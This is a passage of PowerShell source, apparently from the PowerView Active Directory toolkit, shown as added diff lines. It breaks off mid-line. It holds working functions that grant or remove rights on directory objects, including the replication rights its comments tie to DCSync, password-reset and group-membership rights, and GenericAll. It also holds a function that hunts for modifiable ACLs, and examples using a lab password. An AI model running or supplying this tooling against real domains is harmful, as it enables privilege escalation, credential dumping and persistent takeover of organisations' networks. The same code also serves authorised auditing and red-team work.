$TargetLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $TargetSearchBase, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String[]] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] + [String] + $Rights = 'All', + + [Guid] + $RightsGUID + ) + + BEGIN { + $TargetSearcherArguments = @{ + 'Properties' = 'distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain } + if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter } + if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase } + if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential } + + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principals = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principals) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + } + + PROCESS { + $TargetSearcherArguments['Identity'] = $TargetIdentity + $Targets = Get-DomainObject @TargetSearcherArguments + + ForEach ($TargetObject in $Targets) { + + $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' + $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow' + $ACEs = @() + + if ($RightsGUID) { + $GUIDs = @($RightsGUID) + } + else { + $GUIDs = Switch ($Rights) { + # ResetPassword doesn't need to know the user's current password + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + # allows for the modification of group membership + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c + # when applied to a domain's ACL, allows for the use of DCSync + 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} + } + } + + ForEach ($PrincipalObject in $Principals) { + Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)" + + try { + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid) + + if ($GUIDs) { + ForEach ($GUID in $GUIDs) { + $NewGUID = New-Object Guid $GUID + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType + } + } + else { + # deault to GenericAll rights + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType + } + + # add all the new ACEs to the specified object directory entry + ForEach ($ACE in $ACEs) { + Write-Verbose "[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)" + $TargetEntry = $TargetObject.GetDirectoryEntry() + $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl' + $TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE) + $TargetEntry.PsBase.CommitChanges() + } + } + catch { + Write-Verbose "[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_" + } + } + } + } +} + + +function Remove-DomainObjectAcl { +<# +.SYNOPSIS + +Removes an ACL from a specific active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID can be set with -RightsGUID. These rights are removed from the target +object for the specified -PrincipalIdentity. + +.PARAMETER TargetIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. Required. Wildcards accepted. + +.PARAMETER TargetDomain + +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +.PARAMETER TargetLDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory object targets. + +.PARAMETER TargetSearchBase + +The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Rights + +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +.PARAMETER RightsGUID + +Manual GUID representing the right to add to the target. + +.EXAMPLE + +$UserSID = Get-DomainUser user | Select-Object -ExpandProperty objectsid +Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID} + +[no results returned] + +Add-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword + +Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID } + +AceQualifier : AccessAllowed +ObjectDN : CN=user2,CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-883232822-274137685-4173207997-2105 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-883232822-274137685-4173207997-2104 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + + +Remove-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword + +Get-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID} + +[no results returned] + +.LINK + +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $TargetIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $TargetDomain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $TargetLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $TargetSearchBase, + + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String[]] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')] + [String] + $Rights = 'All', + + [Guid] + $RightsGUID + ) + + BEGIN { + $TargetSearcherArguments = @{ + 'Properties' = 'distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain } + if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter } + if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase } + if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential } + + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principals = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principals) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + } + + PROCESS { + $TargetSearcherArguments['Identity'] = $TargetIdentity + $Targets = Get-DomainObject @TargetSearcherArguments + + ForEach ($TargetObject in $Targets) { + + $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None' + $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow' + $ACEs = @() + + if ($RightsGUID) { + $GUIDs = @($RightsGUID) + } + else { + $GUIDs = Switch ($Rights) { + # ResetPassword doesn't need to know the user's current password + 'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' } + # allows for the modification of group membership + 'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' } + # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 + # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c + # when applied to a domain's ACL, allows for the use of DCSync + 'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'} + } + } + + ForEach ($PrincipalObject in $Principals) { + Write-Verbose "[Remove-DomainObjectAcl] Removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname)" + + try { + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid) + + if ($GUIDs) { + ForEach ($GUID in $GUIDs) { + $NewGUID = New-Object Guid $GUID + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType + } + } + else { + # deault to GenericAll rights + $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll' + $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType + } + + # remove all the specified ACEs from the specified object directory entry + ForEach ($ACE in $ACEs) { + Write-Verbose "[Remove-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)" + $TargetEntry = $TargetObject.GetDirectoryEntry() + $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl' + $TargetEntry.PsBase.ObjectSecurity.RemoveAccessRule($ACE) + $TargetEntry.PsBase.CommitChanges() + } + } + catch { + Write-Verbose "[Remove-DomainObjectAcl] Error removing principal $($PrincipalObject.distinguishedname) '$Rights' from $($TargetObject.Properties.distinguishedname) : $_" + } + } + } + } +} + + +function Find-InterestingDomainAcl { +<# +.SYNOPSIS + +Finds object ACLs in the current (or specified) domain with modification +rights set to non-built in objects. + +Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName + +.DESCRIPTION + +This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl, +and for each returned ACE entry it checks if principal security identifier +is *-1000 (meaning the account is not built in), and also checks if the rights for +the ACE mean the object can be modified by the principal. If these conditions are met, +then the security identifier SID is translated, the domain object is retrieved, and +additional IdentityReference* information is appended to the output object. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER ResolveGUIDs + +Switch. Resolve GUIDs to their display names. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Find-InterestingDomainAcl + +Finds interesting object ACLS in the current domain. + +.EXAMPLE + +Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs + +Finds interesting object ACLS in the ev.testlab.local domain and +resolves rights GUIDs to display names. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs + +.OUTPUTS + +PowerView.ACL + +Custom PSObject with ACL entries. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.ACL')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DomainName', 'Name')] + [String] + $Domain, + + [Switch] + $ResolveGUIDs, + + [String] + [ValidateSet('All', 'ResetPassword', 'WriteMembers')] + $RightsFilter, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ACLArguments = @{} + if ($PSBoundParameters['ResolveGUIDs']) { $ACLArguments['ResolveGUIDs'] = $ResolveGUIDs } + if ($PSBoundParameters['RightsFilter']) { $ACLArguments['RightsFilter'] = $RightsFilter } + if ($PSBoundParameters['LDAPFilter']) { $ACLArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $ACLArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $ACLArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ACLArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ACLArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential } + + $ObjectSearcherArguments = @{ + 'Properties' = 'samaccountname,objectclass' + 'Raw' = $True + } + if ($PSBoundParameters['Server']) { $ObjectSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ObjectSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ObjectSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ObjectSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ObjectSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ObjectSearcherArguments['Credential'] = $Credential } + + $ADNameArguments = @{} + if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server } + if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential } + + # ongoing list of built-up SIDs + $ResolvedSIDs = @{} + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + $ACLArguments['Domain'] = $Domain + $ADNameArguments['Domain'] = $Domain + } + + Get-DomainObjectAcl @ACLArguments | ForEach-Object { + + if ( ($_.ActiveDirectoryRights -match 'GenericAll|Write|Create|Delete') -or (($_.ActiveDirectoryRights -match 'ExtendedRight') -and ($_.AceQualifier -match 'Allow'))) { + # only process SIDs > 1000 + if ($_.SecurityIdentifier.Value -match '^S-1-5-.*-[1-9]\d{3,}$') { + if ($ResolvedSIDs[$_.SecurityIdentifier.Value]) { + $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass = $ResolvedSIDs[$_.SecurityIdentifier.Value] + + $InterestingACL = New-Object PSObject + $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN + $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier + $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights + if ($_.ObjectAceType) { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType + } + else { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None' + } + $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags + $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType + $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags + $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass + $InterestingACL + } + else { + $IdentityReferenceDN = Convert-ADName -Identity $_.SecurityIdentifier.Value -OutputType DN @ADNameArguments + # "IdentityReferenceDN: $IdentityReferenceDN" + + if ($IdentityReferenceDN) { + $IdentityReferenceDomain = $IdentityReferenceDN.SubString($IdentityReferenceDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + # "IdentityReferenceDomain: $IdentityReferenceDomain" + $ObjectSearcherArguments['Domain'] = $IdentityReferenceDomain + $ObjectSearcherArguments['Identity'] = $IdentityReferenceDN + # "IdentityReferenceDN: $IdentityReferenceDN" + $Object = Get-DomainObject @ObjectSearcherArguments + + if ($Object) { + $IdentityReferenceName = $Object.Properties.samaccountname[0] + if ($Object.Properties.objectclass -match 'computer') { + $IdentityReferenceClass = 'computer' + } + elseif ($Object.Properties.objectclass -match 'group') { + $IdentityReferenceClass = 'group' + } + elseif ($Object.Properties.objectclass -match 'user') { + $IdentityReferenceClass = 'user' + } + else { + $IdentityReferenceClass = $Null + } + + # save so we don't look up more than once + $ResolvedSIDs[$_.SecurityIdentifier.Value] = $IdentityReferenceName, $IdentityReferenceDomain, $IdentityReferenceDN, $IdentityReferenceClass + + $InterestingACL = New-Object PSObject + $InterestingACL | Add-Member NoteProperty 'ObjectDN' $_.ObjectDN + $InterestingACL | Add-Member NoteProperty 'AceQualifier' $_.AceQualifier + $InterestingACL | Add-Member NoteProperty 'ActiveDirectoryRights' $_.ActiveDirectoryRights + if ($_.ObjectAceType) { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' $_.ObjectAceType + } + else { + $InterestingACL | Add-Member NoteProperty 'ObjectAceType' 'None' + } + $InterestingACL | Add-Member NoteProperty 'AceFlags' $_.AceFlags + $InterestingACL | Add-Member NoteProperty 'AceType' $_.AceType + $InterestingACL | Add-Member NoteProperty 'InheritanceFlags' $_.InheritanceFlags + $InterestingACL | Add-Member NoteProperty 'SecurityIdentifier' $_.SecurityIdentifier + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceName' $IdentityReferenceName + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDomain' $IdentityReferenceDomain + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceDN' $IdentityReferenceDN + $InterestingACL | Add-Member NoteProperty 'IdentityReferenceClass' $IdentityReferenceClass + $InterestingACL + } + } + else { + Write-Warning "[Find-InterestingDomainAcl] Unable to convert SID '$($_.SecurityIdentifier.Value )' to a distinguishedname with Convert-ADName" + } + } + } + } + } + } +} + + +function Get-DomainOU { +<# +.SYNOPSIS + +Search for all organization units (OUs) or specific OU objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties whencreated,usnchanged,...". By default, all OU objects for +the current domain are returned. + +.PARAMETER Identity + +An OU name (e.g. TestOU), DistinguishedName (e.g. OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. 8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). Wildcards accepted. + +.PARAMETER GPLink + +Only return OUs with the specified GUID in their gplink property. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Specifies the properties of the output object to retrieve from the server. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainOU + +Returns the current OUs in the domain. + +.EXAMPLE + +Get-DomainOU *admin* -Domain testlab.local + +Returns all OUs with "admin" in their name in the testlab.local domain. + +.EXAMPLE + +Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" + +Returns all OUs with linked to the specified group policy object. + +.EXAMPLE + +"*admin*","*server*" | Get-DomainOU + +Search for OUs with the specific names. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainOU -Credential $Cred + +.OUTPUTS + +PowerView.OU + +Custom PSObject with translated OU property fields. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.OU')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + [Alias('GUID')] + $GPLink, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $OUSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + if ($OUSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match 